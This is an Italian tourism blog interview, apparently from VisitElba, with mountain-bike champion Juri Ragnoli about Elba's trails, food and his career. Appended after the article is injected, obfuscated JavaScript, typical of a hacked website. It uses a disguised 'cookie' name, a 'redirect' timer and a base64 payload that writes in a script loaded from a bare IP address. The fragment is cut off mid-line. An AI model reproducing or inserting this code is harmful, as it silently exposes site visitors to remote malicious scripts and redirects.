In questi giorni l’Elba ospita il mitico Juri Ragnoli, campione italiano di Mountain Bike specialità Marathon.
Juri ha solo 28 anni ma ha già le idee ben chiare e una passione fortissima per uno degli sport più active e adrenalitici che ci sia.
Non è la prima volta che visita l’isola. Oggi c’è molto vento ma non si è certo lasciato scoraggiare.
Lo intervistiamo in serata, dopo una giornata in sella e gli chiediamo perchè si trova qui proprio oggi.
“Amo molto l’Elba e quando mi è stato chiesto di girare un video per la prossima Legend Cup non mi sono lasciato sfuggire questa occasione”
Gli chiediamo cosa preferisce dell’isola:
” Il paesaggio che unisce la bellezza del mare, la maestosità della montagna ed i percorsi fantastici di mountain bike”
Aggiunge di avere un debole per la cucina ed in particolare le specialità di pesce...
Ci confida che la sua giornata di oggi è iniziata alle 8 e ha mangiato solo un pò di frutta. Ha dedicato l’intera giornata al suo sport preferito tra i percorsi bike a Capoliveri.
Juri è un vero campione, lo scorso anno ha forato una ruota mentre era in testa e nonostante questo è riuscito a sistemare il danno, ripartire e aggiudicarsi il terzo posto durante una gara. E’ un ragazzo molto gentile e disponibile e accoglie lo staff di VisitElba nel migliore dei modi.
Si è avvicinato a questo sport dall’età di 14 anni quando durante la bella stagione ” prendeva in prestito” la bici del padre 🙂
” Mountan bike per me è puro divertimento e adrenalina, ma la cosa più importante è che quando finisco gli allenamenti sto veramente bene, mi sento completo e soddisfatto al 100 per cento.
Ci sono tante possibilità di avvicinarsi al mondo della mountan bike – soprattutto all’Elba– e ritengo sia uno dei migliori sport sia a livello fisico che mentale.”
Gli chiediamo cosa ne pensa dell’isola d’Elba in merito alla sua passione:
” L’isola è davvero un paradiso per questo sport: ci sono percorsi per tutte le esigenze; dai più semplici come quello sul Calamita a quelli più divertenti e tecnici come quelli della Legend. La consiglio davvero a tutti gli amanti della bike”.
A questo punto si è fatto tardi quindi ringraziamo Juri e lo lasciamo andare a cena…
Torna a trovarci presto siamo tutti con te 😉
_ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘